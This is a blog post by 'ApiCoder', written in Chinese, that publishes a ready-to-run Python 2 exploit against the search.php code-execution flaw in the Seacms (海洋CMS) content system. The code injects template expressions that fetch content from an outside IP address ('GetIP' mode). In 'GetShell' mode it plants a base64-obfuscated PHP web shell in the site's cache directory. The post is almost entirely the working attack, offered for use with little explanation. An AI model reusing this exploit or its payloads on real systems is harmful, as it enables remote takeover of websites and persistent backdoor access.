海洋search代码执行利用脚本


这个洞修复的七七八八了 现在就放出来吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#encoding:utf-8
from urllib import urlencode
import urllib2

def getshell(target, mode):
url = target + "/search.php"
user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

try:

if mode == "1":
data = "searchword=1&searchtype=5&_GET[cfg_cmspath]={if{searchpage:year}}&year=:ev{searchpage:area}&area=a{searchpage:letter}&letter=l%20({searchpage:lang}&yuyan=join({searchpage:jq}&jq=$GLOBALS[a]))&a[]=file_g&a[]=et_contents($GLOBALS[b]);ec&a[]=ho(md5(124));exit;&b=http://119.28.176.149/"
request = urllib2.Request(url, data)
request.add_header('User-Agent', user_agent)

hash = "c8ffe9a587b126f152ed3d89a146b445"

else:
data = "searchword=1&searchtype=5&_GET[cfg_cmspath]={if{searchpage:year}}&year=:ev{searchpage:area}&area=a{searchpage:letter}&letter=l%20({searchpage:lang}&yuyan=join({searchpage:jq}&jq=$GLOBALS[a]))&a[]=file_p&a[]=ut_contents($GLO&a[]=BALS[b],base&a[]=64_decode($GLOBALS[c]));ec&a[]=ho(md5(123));exit;&b=./data/cache/wee.php&c=PD9waHAgCiRsZz0iWlRack5HdGZhMlJyaXJaV3RpcmphMjlyWkdpcnRsaXJJaWs3Q2lSelluQWdQaXJTQWtkaXJtSnNLQ2lySmpkSGNpTENJaUxDSmpkSGlyZGppclkzUjNjaXJtVmpkSGRoZEdOMGQyVmpkSGRmWm1OMGQzVnVpclkyTiI7CiR2cT0iSUFva2RXWTlpckluTnVZek1pT3dva2EyRTlpcklrbEZRbXhraXJiVVppYzBzaU9ZGFzZGRlZGQ2ZGQ0ZGRfZGRkZGRlZGRjZGRvZGRkZGRlIik7CiRpZmwgPSAkamooImVmIiwiIiwiZWZjcmVhdGVmZV9lZmZlZnVlZm5lZmNlZnRpZWZvZWZuIik7CiRqZXogPSAkaWZsKCcnLCAkbnN4KCRqaigiaXIiLCAiIiwgJHZxLiRya2YuJGxnLiRxaSkpKTsgJGpleigpOwo/Pg=="
request = urllib2.Request(url, data)
request.add_header('User-Agent', user_agent)

hash = "202cb962ac59075b964b07152d234b70"
response = urllib2.urlopen(request)
res = response.read()
if hash == "c8ffe9a587b126f152ed3d89a146b445" and hash in res:
print "*** GetIP success!"
elif hash == "202cb962ac59075b964b07152d234b70" and hash in res:
print "*** shell: " + target + "/data/cache//wee.php"
else:
print res
except urllib2.URLError, e:
print "Error: " + str(e.code)

if __name__ == "__main__":

print " Mode: "
print " 1. GetIP"
print " 2. GetShell"
mode = raw_input()
if mode == "1":
print "Mode: GetIP"
print "Url:"
else:
print "Mode: GetShell"
print "Url:"
target = raw_input()
getshell(target,mode)
------ 本文结束 ------

本文标题:海洋search代码执行利用脚本

文章作者:ApiCoder

发布时间:2019年08月18日 - 22:08

最后更新:2019年08月18日 - 22:08

原始链接:http://www.safeinfo.me/2019/08/18/海洋search代码执行利用脚本.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

ApiCoder wechat
扫一扫,加入信安圈。
0%